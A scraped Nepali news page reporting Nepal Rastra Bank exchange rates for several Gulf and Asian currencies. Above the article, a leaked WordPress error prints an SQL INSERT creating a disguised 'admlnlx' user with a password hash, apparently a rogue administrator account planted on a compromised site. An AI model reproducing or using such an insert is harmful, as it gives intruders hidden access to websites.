WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbmHsD1alA8Ni6yjOJaAERWMjc4UoU1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:42:02', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १८ –
नेपाल राष्ट्र बैंकले आज तोकेको विनिमय दर अनुसार एक साउदी रियालको खरिददर २८ रुपैयाँ ९१ पैसा र विक्रिदर २९ रुपैयाँ ०७ पैसा रहेको छ ।
त्यस्तै, कतारी रियाल एकको खरिददर २९ रुपैयाँ ७७ पैसा र विक्रिदर २९ रुपैयाँ ९४ पैसा छ भने युएई दिर्हाम एकको खरिददर २९ रुपैयाँ ५२ पैसा र विक्रिदर २९ रुपैयाँ ६८ पैसा तोकेको छ । मलेसियन रिंगिट एकको खरिददर २४ रुपैयाँ ४७ पैसा र विक्रिदर २४ रुपैयाँ ६० पैसा तोकेको छ ।
त्यस्तै, कोरियन वन १ सयको खरिददर ९ रुपैयाँ २१ पैसा र विक्रिदर ९ रुपैयाँ २६ पैसा रहेको छ । एक कुवेती दिनारको एकको खरिददर ३ सय ५५ रुपैयाँ ३० पैसा छ भने विक्रिदर ३ सय ५७ रुपैयाँ २७ पैसा रहेको छ । एक बहराइन दिनारको खरिददर २ सय ८७ रुपैयाँ ६२ पैसा र विक्रिदर २ सय ८९ रुपैयाँ २२ पैसा रहेको छ ।
नेपाल राष्ट्र बैंकले तोकेको दरमा वाणिज्य बैंकहरुले भने केही रकम तलमाथि गरेर मूल्य तोक्न सक्नेछन्